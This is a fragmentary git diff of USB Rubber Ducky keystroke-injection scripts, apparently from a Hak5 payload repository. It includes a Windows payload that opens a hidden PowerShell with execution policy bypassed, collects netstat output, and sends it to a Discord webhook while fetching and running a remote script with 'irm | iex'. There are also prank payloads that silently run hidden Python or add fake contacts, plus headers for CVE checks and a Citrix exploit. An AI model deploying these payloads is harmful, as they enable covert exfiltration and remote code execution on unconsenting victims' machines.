# Target : Windows 10-11 #
|
||||||
REM ###########################################################
|
# #
|
||||||
|
###########################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet connection
|
REM - Internet connection
|
||||||
|
|
|
@ -1,45 +1,84 @@
|
||||||
REM ###################################################################
|
REM_BLOCK
|
||||||
REM # |
|
###################################################################
|
||||||
REM # Title : Windows-netstat-to-Discord-Exfiltration |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Windows-netstat-to-Discord-Exfiltration #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Net, Exfiltration |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Net, Exfiltration #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM ###################################################################
|
# #
|
||||||
|
###################################################################
|
||||||
|
|
||||||
REM Title: Windows-netstat-to-Discord-Exfiltration
|
Title: Windows-netstat-to-Discord-Exfiltration
|
||||||
REM Author: Aleff
|
Author: Aleff
|
||||||
REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||||
REM Put 1 on the function that you want to active, else 0. Functions available:
|
Put 1 on the function that you want to active, else 0. Functions available:
|
||||||
REM - default (simple 'netstat' command)
|
- default (simple 'netstat' command)
|
||||||
REM - routing_table $r
|
- routing_table $r
|
||||||
REM - listening_canonical $lc
|
- listening_canonical $lc
|
||||||
REM - listening_numerical $ln
|
- listening_numerical $ln
|
||||||
REM - all_canonical $ac
|
- all_canonical $ac
|
||||||
REM - all_numerical $an
|
- all_numerical $an
|
||||||
REM - offload ot
|
- offload ot
|
||||||
REM - proto $p "<protocol>"
|
- proto $p "<protocol>"
|
||||||
REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
|
- - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
|
||||||
|
|
||||||
REM Target: Windows 10-11 (PowerShell)
|
Target: Windows 10-11 (PowerShell)
|
||||||
REM Version: 1.0
|
Version: 1.0
|
||||||
REM Category: Net, Exfiltration
|
Category: Net, Exfiltration
|
||||||
REM Requirements: Internet connection
|
Requirements: Internet connection
|
||||||
REM
|
END_REM
|
||||||
|
|
||||||
REM REQUIRED - Provide your Discord WEBHOOK
|
REM REQUIRED - Provide your Discord WEBHOOK
|
||||||
DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
DEFINE #WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
||||||
|
|
||||||
|
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
|
||||||
|
DEFINE #PAYLOAD example.com
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 2000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 250
|
DELAY 250
|
||||||
DELETE
|
DELETE
|
||||||
STRING powershell -w h -ep bypass $discord='
|
STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm #PAYLOAD | iex
|
||||||
|
|
||||||
STRING WEBHOOK
|
|
||||||
|
|
||||||
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
|
|
||||||
DEFINE PAYLOAD example.com
|
|
||||||
STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
|
|
||||||
ENTER
|
|
||||||
|
|
|
@ -1,13 +1,14 @@
|
||||||
REM #############################################################################################
|
REM_BLOCK
|
||||||
REM # #
|
#############################################################################################
|
||||||
REM # Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
|
# #
|
||||||
REM # Author : Aleff #
|
# Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
|
||||||
REM # Version : 1.0 #
|
# Author : Aleff #
|
||||||
REM # Category : incident-response #
|
# Version : 1.0 #
|
||||||
REM # Target : Cisco IOS XE #
|
# Category : incident-response #
|
||||||
REM # #
|
# Target : Cisco IOS XE #
|
||||||
REM #############################################################################################
|
# #
|
||||||
|
#############################################################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Set the script name, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
|
REM Set the script name, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
|
||||||
DEFINE #SCRIPT-NAME auto-check.sh
|
DEFINE #SCRIPT-NAME auto-check.sh
|
||||||
|
@ -75,17 +76,17 @@ STRINGLN
|
||||||
done' > #PATH-TO-SCRIPT#SCRIPT-NAME
|
done' > #PATH-TO-SCRIPT#SCRIPT-NAME
|
||||||
END_STRINGLN
|
END_STRINGLN
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
REM To avoid some bad DELAY I decided to use only one command row
|
REM To avoid some bad DELAY I decided to use only one command row
|
||||||
|
|
||||||
REM Old script
|
REM_BLOCK
|
||||||
REM STRINGLN sudo chmod +x #SCRIPT-NAME
|
Old script:
|
||||||
REM DELAY 500
|
STRINGLN sudo chmod +x #SCRIPT-NAME
|
||||||
REM STRINGLN #SUDO-PSWD
|
DELAY 500
|
||||||
REM DELAY 3000
|
STRINGLN #SUDO-PSWD
|
||||||
REM STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
|
DELAY 3000
|
||||||
REM STRINGLN exit
|
STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
|
||||||
|
STRINGLN exit
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Optimized script
|
REM Optimized script
|
||||||
STRINGLN sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit
|
STRINGLN sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit
|
||||||
|
|
|
@ -1,34 +1,79 @@
|
||||||
REM #######################################################################################################################
|
REM_BLOCK
|
||||||
REM # |
|
#######################################################################################################################
|
||||||
REM # Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Incident Response |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10/11 |
|
# Category : Incident Response #
|
||||||
REM # |
|
# Target : Windows 10/11 #
|
||||||
REM #######################################################################################################################
|
# #
|
||||||
|
#######################################################################################################################
|
||||||
|
|
||||||
REM PlugAndPlay <3
|
PlugAndPlay <3
|
||||||
|
|
||||||
REM Requirements:
|
Requirements:
|
||||||
REM - ExecutionPolicy Bypass
|
- ExecutionPolicy Bypass
|
||||||
|
|
||||||
REM Impact: Remote Code Execution
|
Impact: Remote Code Execution
|
||||||
REM Max Severity: Important
|
Max Severity: Important
|
||||||
|
|
||||||
REM Mitigation:
|
Mitigation:
|
||||||
|
|
||||||
REM - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
|
- Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
|
||||||
|
|
||||||
REM - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
|
- The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
|
||||||
|
|
||||||
REM The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
|
The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
|
||||||
|
|
||||||
REM It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
|
It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
|
||||||
|
|
||||||
REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
|
Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
GUI x
|
GUI x
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING a
|
STRING a
|
||||||
|
|
|
@ -1,25 +1,27 @@
|
||||||
REM ########################################################
|
REM_BLOCK
|
||||||
REM # |
|
########################################################
|
||||||
REM # Title : Defend Yourself From CVE-2023-23397 |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Defend Yourself From CVE-2023-23397 #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Incident-Response |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10/11 |
|
# Category : Incident-Response #
|
||||||
REM # |
|
# Target : Windows 10/11 #
|
||||||
REM ########################################################
|
# #
|
||||||
|
########################################################
|
||||||
|
|
||||||
REM PlugAndPlay <3
|
PlugAndPlay <3
|
||||||
|
|
||||||
REM Requirements:
|
Requirements:
|
||||||
REM - ExecutionPolicy Bypass
|
- ExecutionPolicy Bypass
|
||||||
REM - PayloadStudio 1.3.1
|
- PayloadStudio 1.3.1
|
||||||
|
|
||||||
REM Impacted Products:
|
Impacted Products:
|
||||||
REM - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
|
- All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
|
||||||
|
|
||||||
REM Mitigation:
|
Mitigation:
|
||||||
REM - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
|
- Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
|
||||||
REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
|
Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
|
||||||
|
END_REM
|
||||||
|
|
||||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
REM VERSION 1.1
|
REM VERSION 1.1
|
||||||
|
|
|
@ -1,12 +1,14 @@
|
||||||
REM ################################################################################
|
REM_BLOCK
|
||||||
REM # #
|
################################################################################
|
||||||
REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
|
# #
|
||||||
REM # Author : Aleff #
|
# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
|
||||||
REM # Version : 1.0 #
|
# Author : Aleff #
|
||||||
REM # Category : incident-response #
|
# Version : 1.0 #
|
||||||
REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
|
# Category : incident-response #
|
||||||
REM # #
|
# Target : Citrix NetScaler ADV; NetScaler Gateway #
|
||||||
REM ################################################################################
|
# #
|
||||||
|
################################################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
|
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
|
||||||
DEFINE #HOSTNAME example
|
DEFINE #HOSTNAME example
|
||||||
|
|
|
@ -0,0 +1,66 @@
|
||||||
|
# Create RickRoll Contact - iOS
|
||||||
|
|
||||||
|
This payload is a prank script designed to create a contact named "Ricky Astley" (a nod to the "RickRoll" meme) on an iOS device. It utilizes a dynamic delay mechanism to ensure the system is ready before executing commands. The automated process opens the Contacts app, creates a new contact, and fills in various fields with predefined information: name, last name, phone number, email, website, and other optional details. The fake contact serves as a lighthearted prank, silently inserting a “RickRoll” in the form of a contact entry.
|
||||||
|
|
||||||
|
### Details
|
||||||
|
|
||||||
|
- **Title**: Create RickRoll Contact
|
||||||
|
- **Author**: bst04 - Aleff
|
||||||
|
- **Version**: 1.0
|
||||||
|
- **Category**: Prank
|
||||||
|
- **Target**: iOS devices
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
- We believe that these 4 pieces of information are critical to making contact, even if it is for fun.
|
||||||
|
|
||||||
|
```
|
||||||
|
DEFINE #CONTACTS-APP-NAME Contacts
|
||||||
|
DEFINE #CONTACT-NAME Ricky
|
||||||
|
DEFINE #CONTACT-LAST-NAME Astley
|
||||||
|
DEFINE #CONTACT-PHONE-NUMBER +1(111)111-1111
|
||||||
|
```
|
||||||
|
|
||||||
|
- Other optional DEFINEs
|
||||||
|
|
||||||
|
```
|
||||||
|
DEFINE #CONTACT-COMPANY example
|
||||||
|
DEFINE #CONTACT-E-MAIL example
|
||||||
|
DEFINE #CONTACT-WEBSITE-URL example
|
||||||
|
DEFINE #CONTACT-BIRTHDAY example
|
||||||
|
DEFINE #CONTACT-STREET example
|
||||||
|
DEFINE #CONTACT-CITY example
|
||||||
|
DEFINE #CONTACT-STATE example
|
||||||
|
DEFINE #CONTACT-ZIP example
|
||||||
|
DEFINE #CONTACT-COUNTRY example
|
||||||
|
```
|
||||||
|
|
||||||
|
- Note that if you don't want to set some settings you have to remove the piece of code that sets it as well, for istance...
|
||||||
|
|
||||||
|
If you want to remove the zip contact info, you should change this one piece of code from this...
|
||||||
|
|
||||||
|
```
|
||||||
|
REM zip
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-ZIP
|
||||||
|
TAB
|
||||||
|
```
|
||||||
|
|
||||||
|
... to this...
|
||||||
|
|
||||||
|
```
|
||||||
|
REM zip
|
||||||
|
DELAY 250
|
||||||
|
REM STRING #CONTACT-ZIP
|
||||||
|
TAB
|
||||||
|
```
|
||||||
|
|
||||||
|
In this way you are going to ignore this step but without altering the proper flow of available information.
|
||||||
|
|
||||||
|
### How It Works
|
||||||
|
|
||||||
|
1. Sets a user-defined options.
|
||||||
|
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
|
||||||
|
3. After readiness is confirmed, the script:
|
||||||
|
- Runs commands to open **Contacts**.
|
||||||
|
- Executes some commands to sets the new contact information
|
|
@ -0,0 +1,135 @@
|
||||||
|
REM_BLOCK
|
||||||
|
############################################
|
||||||
|
# #
|
||||||
|
# Title : Create RickRoll Contact #
|
||||||
|
# Author : bst04 - Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Prank #
|
||||||
|
# Target : iOS #
|
||||||
|
# #
|
||||||
|
############################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM @@@ START MANDATORY DEFINEs @@@
|
||||||
|
REM We believe that these 4 pieces of information are critical to making contact, even if it is for fun.
|
||||||
|
|
||||||
|
DEFINE #CONTACTS-APP-NAME Contacts
|
||||||
|
DEFINE #CONTACT-NAME Ricky
|
||||||
|
DEFINE #CONTACT-LAST-NAME Astley
|
||||||
|
DEFINE #CONTACT-PHONE-NUMBER +1(111)111-1111
|
||||||
|
|
||||||
|
REM @@@ START OPTIONAL DEFINEs @@@
|
||||||
|
|
||||||
|
DEFINE #CONTACT-COMPANY example
|
||||||
|
DEFINE #CONTACT-E-MAIL example
|
||||||
|
DEFINE #CONTACT-WEBSITE-URL example
|
||||||
|
DEFINE #CONTACT-BIRTHDAY example
|
||||||
|
DEFINE #CONTACT-STREET example
|
||||||
|
DEFINE #CONTACT-CITY example
|
||||||
|
DEFINE #CONTACT-STATE example
|
||||||
|
DEFINE #CONTACT-ZIP example
|
||||||
|
DEFINE #CONTACT-COUNTRY example
|
||||||
|
|
||||||
|
REM @@@ START PAYLOAD @@@
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
|
||||||
|
DELAY 200
|
||||||
|
|
||||||
|
GUI SPACE
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN #CONTACTS-APP-NAME
|
||||||
|
DELAY 500
|
||||||
|
GUI n
|
||||||
|
|
||||||
|
REM name
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-NAME
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM last name
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-LAST-NAME
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM company
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-COMPANY
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM phone number
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-PHONE-NUMBER
|
||||||
|
TAB
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM mail
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-E-MAIL
|
||||||
|
TAB
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM url
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-WEBSITE-URL
|
||||||
|
TAB
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM birthday
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-BIRTHDAY
|
||||||
|
TAB
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM street
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-STREET
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM city
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-CITY
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM state
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-STATE
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM zip
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-ZIP
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM country/region
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-COUNTRY
|
||||||
|
TAB
|
||||||
|
GUI q
|
|
@ -1,39 +1,79 @@
|
||||||
|
REM_BLOCK
|
||||||
|
####################################################
|
||||||
|
# #
|
||||||
|
# Title : Alien Message From Computer #
|
||||||
|
# Author : Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Prank #
|
||||||
|
# Target : Windows 10/11 #
|
||||||
|
# #
|
||||||
|
####################################################
|
||||||
|
|
||||||
REM ####################################################
|
Plug-And-Play <3
|
||||||
REM # |
|
|
||||||
REM # Title : Alien Message From Computer |
|
|
||||||
REM # Author : Aleff |
|
|
||||||
REM # Version : 1.0 |
|
|
||||||
REM # Category : Prank |
|
|
||||||
REM # Target : Windows 10/11 |
|
|
||||||
REM # |
|
|
||||||
REM ####################################################
|
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
- Internet Connection
|
||||||
|
- ExecutionPolicy Bypass
|
||||||
|
- Python
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Plug-And-Play <3
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
REM Requirements:
|
REM_BLOCK DOCUMENTATION
|
||||||
REM - Internet Connection
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
REM - ExecutionPolicy Bypass
|
Includes its own passive detect ready.
|
||||||
REM - Python
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
ENTER
|
|
||||||
DELAY 1500
|
DELAY 1500
|
||||||
|
|
||||||
REM Create the file
|
REM Create the file
|
||||||
STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
|
STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
|
||||||
|
|
||||||
REM Write the code into the file
|
REM Write the code into the file
|
||||||
STRING Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
|
STRINGLN Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
REM Execute the Python script
|
REM Execute the Python script
|
||||||
STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Close the PowerShell
|
REM Close the PowerShell
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
|
@ -1,36 +1,72 @@
|
||||||
REM ######################################################
|
REM_BLOCK
|
||||||
REM # |
|
######################################################
|
||||||
REM # Title : Change Wallpaper With Screenshot |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Change Wallpaper With Screenshot #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Prank |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Prank #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM ######################################################
|
# #
|
||||||
|
######################################################
|
||||||
|
|
||||||
